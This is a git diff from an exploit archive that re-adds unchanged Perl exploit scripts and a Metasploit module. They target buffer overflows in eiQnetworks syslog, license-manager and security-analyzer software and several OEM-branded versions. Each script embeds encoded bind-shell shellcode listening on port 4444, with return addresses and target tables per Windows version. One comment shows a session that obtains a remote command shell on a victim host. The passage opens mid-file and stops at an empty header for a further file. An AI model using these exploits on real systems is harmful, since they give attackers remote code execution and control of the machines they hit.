-$sc2 = -# win32_bind - EXITFUNC=seh LPORT=4444 -# Size=344 Encoder=PexFnstenvSub http://metasploit.com -"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2". -"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3". -"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7". -"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5". -"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04". -"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7". -"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7". -"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c". -"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc". -"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e". -"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f". -"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd". -"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44". -"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65". -"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b". -"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c". -"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01". -"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3". -"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d". -"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc". -"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73". -"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c"; - -# Stage 1 shellcode can only be 128 butes. -# 12 byte Nop find code by skylined? This is bullshit right now... it does not hunt for the right shit. -$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57"; - -# for XP SP1 -# <128 byte or less stage 1 shellcode> - -# Should total 4096 -$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . 
"\x58" x ($bufsize-$b-8-128); - -print "Exploiting $hostname\n"; - -$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM); - -$sock or die "no socket :$!\n"; - -print $sock "$buf"; -close $sock; - -# milw0rm.com [2006-07-27] +#!/usr/bin/perl -w +# +# http://www.digitalmunition.com +# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006 +# Bug found by KF of digitalmunition.com. +# +# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html +# +# Exploit for * Syslog Server by eiQnetworks (OEM for Several vendors) +# +# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default +# +# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a +# forward jump. This would eliminate the need for 2 stages of shellcode. . +# +#SEH chain of thread 00000FF4 +#Address SE handler +#013ECEF8 FWASyslo.00449EDB +#013EFF78 WS2HELP.71AA15CF <-------- I set this address. +# +#013EFF74 90909090 +#013EFF78 909032EB Pointer to next SEH record <--- I set this. +#013EFF7C 71AA15CF SE handler <--- pop pop ret +#013EFF80 90909090 +# +#71AA15CF 5F POP EDI +#71AA15D0 5D POP EBP +#71AA15D1 C2 0800 RETN 8 +# +# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode. +# +use IO::Socket; + +$bufsize = 4096; + +$hostname = "127.0.0.1"; +$nextserec = pack("l", (0xEB069090)); # jmp short +0x06 +$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll (Send this reversed note the 'V') + +# Binary hunts performed by JxT and Titon +$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 
+ +unless (($target,$hostname) = @ARGV,$hostname) { + + print "\n Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n"; + print "\n\nUsage: $0 \n\nTargets:\n\n"; + + foreach $key (sort(keys %tgts)) { + ($a,$b) = split(/\:/,$tgts{"$key"}); + print "\t$key . $a\n"; + } + + print "\n"; + exit 1; +} + + +($a,$b) = split(/\:/,$tgts{"$target"}); +print "*** Target: $a, Len: $b\n"; + +# Stage 2 shellcode can be up to Length of SEH overwrite. +$sc2 = +# win32_bind - EXITFUNC=seh LPORT=4444 +# Size=344 Encoder=PexFnstenvSub http://metasploit.com +"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2". +"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3". +"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7". +"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5". +"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04". +"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7". +"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7". +"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c". +"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc". +"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e". +"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f". +"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd". +"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44". +"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65". +"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b". +"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c". +"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01". +"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3". +"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d". +"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc". 
+"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73". +"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c"; + +# Stage 1 shellcode can only be 128 butes. +# 12 byte Nop find code by skylined? This is bullshit right now... it does not hunt for the right shit. +$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57"; + +# for XP SP1 +# <128 byte or less stage 1 shellcode> + +# Should total 4096 +$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . "\x58" x ($bufsize-$b-8-128); + +print "Exploiting $hostname\n"; + +$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM); + +$sock or die "no socket :$!\n"; + +print $sock "$buf"; +close $sock; + +# milw0rm.com [2006-07-27] diff --git a/platforms/windows/remote/2080.pl b/platforms/windows/remote/2080.pl index e47e21372..efa8e5dd4 100755 --- a/platforms/windows/remote/2080.pl +++ b/platforms/windows/remote/2080.pl 
@@ -1,93 +1,93 @@ -#!/usr/bin/perl -w -# -# http://www.digitalmunition.com -# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006 -# Bug found by Titon of Bastard Labs. -# -# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html -# -# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors) -# -# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13 -# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262 -# Exploiting 192.168.0.13 -# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444 -# Trying 192.168.0.13... -# Connected to 192.168.0.13. -# Escape character is '^]'. -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# C:\Program Files\Network Security Analyzer\fwa>exit -# exit -# Connection closed by foreign host. - -use IO::Socket; -$hostname = "127.0.0.1"; -$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit) -#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit) - -# Binary hunts performed by JxT and Titon -$tgts{"0"} = "G2SRv4.0.36.exe:1262"; -$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494"; -$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262"; -$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262"; -$tgts{"4"} = "FortiReporter_4.2.26.exe:1262"; -$tgts{"5"} = "AstaroReportManagerV37.exe:000"; # Unknown.. need serial -$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262"; - -unless (($target,$hostname) = @ARGV,$hostname) { - - print "\n Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n"; - print "\n\nUsage: $0 \n\nTargets:\n\n"; - - foreach $key (sort(keys %tgts)) { - ($a,$b) = split(/\:/,$tgts{"$key"}); - print "\t$key . 
$a\n"; - } - - print "\n"; - exit 1; -} - -$ret = pack("l", ($retval)); -($a,$b) = split(/\:/,$tgts{"$target"}); -print "*** Target: $a, Len: $b\n"; - -$sc = -# win32_bind - EXITFUNC=seh LPORT=4444 -# Size=344 Encoder=PexFnstenvSub http://metasploit.com -"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2". -"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3". -"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7". -"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5". -"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04". -"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7". -"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7". -"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c". -"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc". -"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e". -"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f". -"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd". -"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44". -"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65". -"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b". -"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c". -"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01". -"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3". -"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d". -"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc". -"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73". -"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c"; - -$nops = "A" x ($b - length($sc)); -$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . 
"&"; - -printf "Exploiting $hostname\n"; -$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM); -$sock or die "no socket :$!\n"; - -print $sock "$buf"; -print "Try connecting to port 4444 on the target.\n"; - -# milw0rm.com [2006-07-27] +#!/usr/bin/perl -w +# +# http://www.digitalmunition.com +# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006 +# Bug found by Titon of Bastard Labs. +# +# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html +# +# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors) +# +# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13 +# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262 +# Exploiting 192.168.0.13 +# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444 +# Trying 192.168.0.13... +# Connected to 192.168.0.13. +# Escape character is '^]'. +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# C:\Program Files\Network Security Analyzer\fwa>exit +# exit +# Connection closed by foreign host. + +use IO::Socket; +$hostname = "127.0.0.1"; +$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit) +#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit) + +# Binary hunts performed by JxT and Titon +$tgts{"0"} = "G2SRv4.0.36.exe:1262"; +$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494"; +$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262"; +$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262"; +$tgts{"4"} = "FortiReporter_4.2.26.exe:1262"; +$tgts{"5"} = "AstaroReportManagerV37.exe:000"; # Unknown.. need serial +$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262"; + +unless (($target,$hostname) = @ARGV,$hostname) { + + print "\n Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n"; + print "\n\nUsage: $0 \n\nTargets:\n\n"; + + foreach $key (sort(keys %tgts)) { + ($a,$b) = split(/\:/,$tgts{"$key"}); + print "\t$key . 
$a\n"; + } + + print "\n"; + exit 1; +} + +$ret = pack("l", ($retval)); +($a,$b) = split(/\:/,$tgts{"$target"}); +print "*** Target: $a, Len: $b\n"; + +$sc = +# win32_bind - EXITFUNC=seh LPORT=4444 +# Size=344 Encoder=PexFnstenvSub http://metasploit.com +"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2". +"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3". +"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7". +"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5". +"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04". +"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7". +"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7". +"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c". +"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc". +"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e". +"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f". +"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd". +"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44". +"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65". +"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b". +"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c". +"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01". +"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3". +"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d". +"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc". +"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73". +"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c"; + +$nops = "A" x ($b - length($sc)); +$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . 
"&"; + +printf "Exploiting $hostname\n"; +$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM); +$sock or die "no socket :$!\n"; + +print $sock "$buf"; +print "Try connecting to port 4444 on the target.\n"; + +# milw0rm.com [2006-07-27] diff --git a/platforms/windows/remote/2140.pm b/platforms/windows/remote/2140.pm index 6b4072f46..9f95b2040 100755 --- a/platforms/windows/remote/2140.pm +++ b/platforms/windows/remote/2140.pm 
@@ -1,106 +1,106 @@ -#!/usr/bin/perl -w - -package Msf::Exploit::EiQ_License; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'EIQ License Manager Overflow', - 'Authors' => [ 'ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com' ], - - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'win2000', 'winxp' ], - 'Priv' => 0, - - 'AutoOpts' => { 'EXITFUNC' => 'seh' }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 10616], - }, - 'Payload' => - { - 'Space' => 494, - 'BadChars' => "\x00\x0a\x0d\x40\x26", - }, - 'Description' => Pex::Text::Freeform(qq{ - This module Exploits a buffer overflow in the LICENCE_MANAGER field of - EiQ networks Enterprise Security Analyzer. This bug was found by Titon - of Bastard Labs. - }), - - - 'Refs' => - [ - ['OSVDB', '27526'], - ], - - 'DefaultTarget' => 1, - 'Targets' => - [ - ['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ], # call ebx - ['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ], # jmp ebx - ['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ], # jmp EBX - ['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], - ['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], - ['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], - ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], - ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], - ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], - ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], - ['iPolicy 
Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], - ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], - ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], - ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], - ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], - ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], - ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], - ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], - ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], - ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], - ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], - ], - }; - - sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - - sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - my $nopsize = $target->[2]; - my $nops = $self->MakeNops($nopsize - length($shellcode)); - my $ret = pack("V", $target->[1]); - my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . 
"&"; - - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1])); - - $s->Send("$evil"); - return; - } - -# milw0rm.com [2006-08-07] +#!/usr/bin/perl -w + +package Msf::Exploit::EiQ_License; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'EIQ License Manager Overflow', + 'Authors' => [ 'ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com' ], + + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'win2000', 'winxp' ], + 'Priv' => 0, + + 'AutoOpts' => { 'EXITFUNC' => 'seh' }, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 10616], + }, + 'Payload' => + { + 'Space' => 494, + 'BadChars' => "\x00\x0a\x0d\x40\x26", + }, + 'Description' => Pex::Text::Freeform(qq{ + This module Exploits a buffer overflow in the LICENCE_MANAGER field of + EiQ networks Enterprise Security Analyzer. This bug was found by Titon + of Bastard Labs. 
+ }), + + + 'Refs' => + [ + ['OSVDB', '27526'], + ], + + 'DefaultTarget' => 1, + 'Targets' => + [ + ['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ], # call ebx + ['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ], # jmp ebx + ['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ], # jmp EBX + ['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], + ['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], + ['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], + ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], + ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], + ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], + ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], + ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], + ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], + ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], + ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], + ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], + ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], + ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], + ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 
Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], + ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ], + ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ], + ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ], + ], + }; + + sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + + sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + my $nopsize = $target->[2]; + my $nops = $self->MakeNops($nopsize - length($shellcode)); + my $ret = pack("V", $target->[1]); + my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&"; + + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1])); + + $s->Send("$evil"); + return; + } + +# milw0rm.com [2006-08-07] diff --git a/platforms/windows/remote/2276.pm b/platforms/windows/remote/2276.pm index af68916f1..ecca7d53f 100755 --- a/platforms/windows/remote/2276.pm +++ b/platforms/windows/remote/2276.pm 
